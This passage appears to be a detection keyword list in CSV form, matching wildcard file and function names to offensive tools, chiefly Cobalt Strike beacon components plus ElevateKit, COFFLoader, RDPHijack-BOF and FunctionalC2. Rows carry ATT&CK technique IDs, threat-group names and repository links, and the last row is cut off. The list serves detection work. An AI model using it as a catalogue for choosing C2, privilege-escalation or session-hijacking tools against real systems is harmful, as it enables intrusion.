APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_elevator_register*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*beacon_elevator_register*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_elevator_register*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_elevators*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_elevators*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_endpoint*c2Get*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,0,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*beacon_endpoint*c2Post*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,0,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*beacon_execute_job*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_exploit_describe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_exploit_register*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*beacon_funcs.c*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*beacon_funcs.h*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*beacon_funcs.x64.*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*beacon_funcs.x86.*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*beacon_generate.py*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*beacon_generate.py*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*Beacon_GETPOST*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*beacon_host_script*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*beacon_host_script*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_inline_execute*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_inline_execute*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*beacon_inline_execute*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*beacon_inline_execute*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_inline_execute*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*beacon_log_clean*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 